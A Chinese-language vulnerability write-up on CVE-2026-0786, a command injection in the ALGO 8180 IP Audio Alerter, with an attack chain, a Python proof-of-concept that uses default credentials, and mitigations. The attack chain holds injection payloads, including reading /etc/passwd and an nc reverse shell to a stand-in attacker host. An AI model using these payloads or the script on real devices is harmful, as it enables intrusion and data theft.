CVE-2026-0786 ALGO 8180 IP Audio Alerter SCI命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-0786

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ALGO 8180 IP Audio Alerter

漏洞概述

CVE-2026-0786是ALGO 8180 IP Audio Alerter设备中的一个严重安全漏洞，CVSS评分高达8.8，属于高危级别。该漏洞存在于设备的SCI（SIP Communication Interface）模块中，源于对用户提供的字符串缺乏适当的验证就直接用于系统调用。攻击者可以利用此漏洞在设备上执行任意代码，实现远程代码执行（RCE）。由于该漏洞被归类为网络可利用（AV:N），攻击者可以通过互联网发起攻击，无需物理接触设备。虽然漏洞需要低权限认证（PR:L），但攻击成功后可获得设备的完整控制权，严重威胁系统的机密性、完整性和可用性。此漏洞由ZDI（Zero Day Initiative）披露，编号为ZDI-CAN-28295，于2026年1月23日公开。ALGO 8180是一款广泛应用于企业、医院、学校等场所的IP音频警报设备，一旦被攻破，攻击者可将其作为内网渗透的跳板，或用于监听和广播敏感信息。

技术细节

该漏洞的根本原因在于SCI模块对用户输入的验证不足。具体来说，当用户通过认证后向SCI模块提交数据时，系统直接将该数据传递给系统调用函数，而没有进行充分的安全检查。攻击者可以通过构造包含恶意命令的请求，利用分号、管道等shell特殊字符注入额外命令。例如，在参数中插入'; whoami;'或'| cat /etc/passwd'等命令，设备会将其作为合法命令的一部分执行。由于该漏洞影响系统调用层面，攻击者可以执行任意系统命令，包括读取敏感配置文件、上传恶意固件或建立持久化后门。攻击者以低权限用户身份认证后即可利用此漏洞，成功利用后将获得与设备系统用户相同的权限（通常为root）。由于ALGO设备通常具有较高的网络访问权限，此漏洞可被用于进一步的内网横向移动。

攻击链分析

STEP 1

步骤1

攻击者识别目标ALGO 8180 IP Audio Alerter设备，获取其IP地址和网络访问路径

STEP 2

步骤2

使用默认凭据或通过其他方式获取设备的低权限用户账号（如admin/admin）

STEP 3

步骤3

通过认证后，访问设备的SCI（SIP Communication Interface）模块API接口

STEP 4

步骤4

构造包含恶意命令的请求，在sci_command参数中注入shell命令，如'; cat /etc/passwd;'或'| nc -e /bin/bash attacker-ip 4444'

STEP 5

步骤5

设备SCI模块将用户输入直接传递给系统调用执行，导致命令注入成功

STEP 6

步骤6

攻击者获得设备shell访问权限，以root权限执行任意代码，实现远程代码执行

STEP 7

步骤7

攻击者可进一步部署后门程序、窃取敏感数据或利用设备作为跳板攻击内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import base64

# CVE-2026-0786 PoC - ALGO 8180 SCI Command Injection
# Target: ALGO 8180 IP Audio Alerter
# Authentication required (low privilege)

TARGET = "http://target-ip:8080"
USERNAME = "admin"
PASSWORD = "admin"

def exploit(target, username, password):
    # Login to obtain session
    session = requests.Session()
    login_data = {'username': username, 'password': password}
    resp = session.post(f"{target}/api/login", data=login_data)
    
    if resp.status_code != 200:
        print("[-] Authentication failed")
        return None
    
    print("[+] Authentication successful")
    
    # Command injection payload - list files
    cmd = "; ls -la /"
    payload = {
        'sci_command': cmd,
        'module': 'system'
    }
    
    # Send malicious request to SCI module
    resp = session.post(f"{target}/api/sci/execute", data=payload)
    
    if resp.status_code == 200:
        print("[+] Command executed successfully")
        print(resp.text)
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    exploit(TARGET, USERNAME, PASSWORD)

影响范围

ALGO 8180 IP Audio Alerter < 最新固件版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）将设备置于隔离网络环境中，避免直接互联网暴露；2）使用网络访问控制列表（ACL）限制对设备管理端口的访问，仅允许受信任的管理IP；3）定期检查设备日志，关注异常的SCI模块调用行为；4）监控设备网络流量，检测可疑的命令注入尝试；5）如果业务允许，考虑暂时禁用SCI模块的非必要功能，减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0786
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0786
3 Details https://www.cvedetails.com/cve/CVE-2026-0786/
4 VulDB https://vuldb.com/cve/CVE-2026-0786
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-008/